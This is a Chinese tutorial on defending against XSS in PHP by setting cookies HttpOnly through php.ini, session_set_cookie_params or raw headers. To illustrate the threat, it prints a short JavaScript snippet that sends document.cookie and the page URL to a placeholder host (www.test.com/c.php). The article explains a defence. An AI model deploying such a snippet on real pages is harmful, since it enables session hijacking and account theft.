xss防御之php利用httponly防xss攻击
更新时间:2014年03月21日 16:24:02 作者:
这篇文章主要介绍了xss防御之php利用httponly防xss攻击,下面是PHP设置HttpOnly的方法,需要的朋友可以参考下
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
复制代码 代码如下:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
PHP设置HttpOnly:
复制代码 代码如下:
//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
对于PHP5.1以前版本的PHP通过:
复制代码 代码如下:
header("Set-Cookie: hidden=value; httpOnly");
最后,HttpOnly不是万能的!
相关文章
GC如其名就是垃圾收集,当然这里仅就内存而言,下面这篇文章主要给大家介绍了关于PHP中GC回收机制利用的相关资料,文中通过图文介绍的非常详细,需要的朋友可以参考下2022-03-03
这篇文章主要介绍了ThinkPHP5.1验证码功能实现的示例代码,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2020-06-06
这篇文章主要介绍了thinkphp整合系列之极验滑动验证码geetest ,功能的实例代码,本文图文并茂给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下2019-06-06
这篇文章主要介绍了Laravel中Kafka的使用详解,kafka是一个分布式消息队列,具有高性能、持久化、多副本备份、横向扩展能力,有对于消息队列感兴趣的同学可以参考下2021-03-03
本例演示了PHP如何操纵XML。留言本具有以下基本功能.2009-11-11
这篇文章主要介绍了ThinkPHP自动填充实现无限级分类的方法,是ThinkPHP项目开发中非常实用的一个技巧,需要的朋友可以参考下2014-08-08
这篇文章主要介绍了php版微信公众号自定义分享内容实现方法,结合实例形式分析了php实现微信公众号自定义分享内容的接口调用与相关使用技巧,需要的朋友可以参考下2016-09-09
这篇文章主要介绍了PHP上传图片类显示缩略图功能的相关资料,重点强调下带有缩鏍图,但是感觉不全面,后续还会继续修改,需要的朋友可以参考下2016-06-06
这篇文章主要介绍了Zend Framework创建自己的动作助手实现方法,结合实例形式分析了基于助手的抽象基类Zend_Controller_Action_Helper_Abstract实现自定义动作助手的相关技巧,需要的朋友可以参考下2016-03-03
PHP导航下拉菜单的实现对于很多朋友来说还是有一定的难度的,下面有个不错的示例,感兴趣的朋友可以参考下,希望对大家有所帮助2013-09-09
最新评论